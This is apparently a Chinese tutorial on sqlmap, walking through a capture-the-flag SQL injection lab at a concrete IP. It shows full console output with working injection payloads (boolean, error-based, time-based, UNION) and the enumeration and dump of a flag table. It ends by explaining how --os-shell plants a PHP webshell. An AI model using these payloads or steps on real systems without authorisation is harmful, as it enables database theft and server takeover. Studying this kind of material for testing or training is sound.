sqlmap基本使用

sqlmap基本使用

sqlmap 是一种开源渗透测试工具,可自动执行检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它配备了一个强大的检测引擎、终极渗透测试器的许多利基功能以及广泛的开关,从数据库指纹识别、从数据库获取数据,到访问底层文件系统和通过带外连接在操作系统上执行命令.

img

参数列表

启动命令

1
python sqlmap.py -u <attack_url> <options>

从URL加载攻击目标

  • -u参数可以快速指定要进行sql注入测试的url,携带参数.适用于简单的GET参数和POST参数请求注入点.sqlmap会自动识别可能存在的注入点,也可以从URL中在参数后附加*来指定注入参数
  • -p用于指定需要测试的参数,且不受--level限制
  • -–data 指定使用进行传输的POST参数
  • --cookie 用于指定cookie,往往用于需要鉴权的注入点

从文件中加载HTTP请求(推荐)

  • -r参数可以从文件中加载HTTP请求,并使用*来指定自定义注入点.
1
python sqlmap.py -r http_payload/1.txt

http_payload/1.txt

1
2
3
4
5
6
7
8
GET /books/1* HTTP/1.1
Host: 182.202.178.28:31603
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: */*
Referer: http://182.202.178.28:31603/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

指定了路径参数1作为参数进行注入.也可以指定多个注入点

可以使用的数据格式不止有路径,也可以在json中进行指定,更方便合理

攻击级别

–level检测级别,共有1-5共5级,默认为1

检测级别不仅会影响 payload 的使用,还会影响注入点的检测(GET 和 POST 参数是一直会被检测的)

以下是检测级别的特殊检测项

  • level >= 2时会检测cookie是否有注入
  • level >= 3时会检测User-Agent和Referer是否有注入
  • level >= 5时会检测Host是否存在注入漏洞

level设置还会影响union注入时检测的列数等

非交互式启动

--batch:非交互式使用 SQLMap,所有的询问都选择默认,存在可能无法找到注入的问题,优点是面对简易注入点时较为方便

加载插件

base64编码

1
sqlmap -u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py

使用--tamper参数可以加载base64加密模块,自动生成base64加密的payload.

数据获取

获取数据库

-dbs参数会自动获取已经完成注入的站点的所有可列出的数据库.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.8.6#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:36:38 /2024-10-15/

[10:36:38] [INFO] parsing HTTP request from 'http_payload/1.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

[10:36:39] [INFO] resuming back-end DBMS 'mysql'
[10:36:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://182.202.178.28:31603/books/1' AND 8054=8054 AND 'ggRL'='ggRL

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://182.202.178.28:31603/books/1' AND GTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(5635=5635,1))),0x71707a7871),5635) AND 'ITOR'='ITOR

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: http://182.202.178.28:31603/books/1' OR SLEEP(5) AND 'poXy'='poXy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://182.202.178.28:31603/books/-7734' UNION ALL SELECT 72,CONCAT(0x71786b7071,0x574e5979524c73674a4b4153484c427a746c704d734270496263796d685064476b69695678447571,0x71707a7871),72-- -
---
[10:36:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:36:44] [INFO] fetching database names
available databases [2]:
[*] book
[*] information_schema

[10:36:50] [INFO] fetched data logged to text files under 'C:\Users\24993\AppData\Local\sqlmap\output\182.202.178.28'

[*] ending @ 10:36:50 /2024-10-15/

获取数据表

-D:指定要使用的数据库

--table:列出指定数据库的所有可见表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -D book --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.8.6#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:39:36 /2024-10-15/

[10:39:36] [INFO] parsing HTTP request from 'http_payload/1.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:39:39] [INFO] resuming back-end DBMS 'mysql'
[10:39:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://182.202.178.28:31603/books/1' AND 8054=8054 AND 'ggRL'='ggRL

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://182.202.178.28:31603/books/1' AND GTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(5635=5635,1))),0x71707a7871),5635) AND 'ITOR'='ITOR

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: http://182.202.178.28:31603/books/1' OR SLEEP(5) AND 'poXy'='poXy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://182.202.178.28:31603/books/-7734' UNION ALL SELECT 72,CONCAT(0x71786b7071,0x574e5979524c73674a4b4153484c427a746c704d734270496263796d685064476b69695678447571,0x71707a7871),72-- -
---
[10:39:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:39:45] [INFO] fetching tables for database: 'book'
Database: book
[2 tables]
+--------+
| books  |
| secret |
+--------+

获取数据列

-T:指定要查询的数据表

--column:列出数据表中存在的所有列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -D book -T secret --columns
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.8.6#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:40:30 /2024-10-15/

[10:40:30] [INFO] parsing HTTP request from 'http_payload/1.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:40:32] [INFO] resuming back-end DBMS 'mysql'
[10:40:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://182.202.178.28:31603/books/1' AND 8054=8054 AND 'ggRL'='ggRL

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://182.202.178.28:31603/books/1' AND GTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(5635=5635,1))),0x71707a7871),5635) AND 'ITOR'='ITOR

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: http://182.202.178.28:31603/books/1' OR SLEEP(5) AND 'poXy'='poXy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://182.202.178.28:31603/books/-7734' UNION ALL SELECT 72,CONCAT(0x71786b7071,0x574e5979524c73674a4b4153484c427a746c704d734270496263796d685064476b69695678447571,0x71707a7871),72-- -
---
[10:40:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:40:37] [INFO] fetching columns for table 'secret' in database 'book'
Database: book
Table: secret
[1 column]
+--------+-----------+
| Column | Type      |
+--------+-----------+
| fl4g   | char(255) |
+--------+-----------+

dump数据

--dump:指定数据库、数据表和数据列,sqlmap将自动获取对应列的数据并导出为csv文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -D book -T secret -C fl4g --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.8.6#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:41:06 /2024-10-15/

[10:41:06] [INFO] parsing HTTP request from 'http_payload/1.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[10:41:08] [INFO] resuming back-end DBMS 'mysql'
[10:41:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://182.202.178.28:31603/books/1' AND 8054=8054 AND 'ggRL'='ggRL

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://182.202.178.28:31603/books/1' AND GTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(5635=5635,1))),0x71707a7871),5635) AND 'ITOR'='ITOR

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: http://182.202.178.28:31603/books/1' OR SLEEP(5) AND 'poXy'='poXy

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: http://182.202.178.28:31603/books/-7734' UNION ALL SELECT 72,CONCAT(0x71786b7071,0x574e5979524c73674a4b4153484c427a746c704d734270496263796d685064476b69695678447571,0x71707a7871),72-- -
---
[10:41:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:41:13] [INFO] fetching entries of column(s) 'fl4g' for table 'secret' in database 'book'
Database: book
Table: secret
[1 entry]
+---------------------------------+
| fl4g                            |
+---------------------------------+
| VIDAR{sqli_C4n_b3_d4ng3r0us!!!} |
+---------------------------------+

附加操作

--os-shell:提示进行交互式操作系统shell

–os-shell的利用条件:

  • 知道网站的物理路径
  • 高权限数据库用户
  • secure_file_priv无限制
  • 网站路径有写入权限

os-shell的实现原理:向特定的web目录下写入webshell文件,之后通过文件来进行php webshell控制.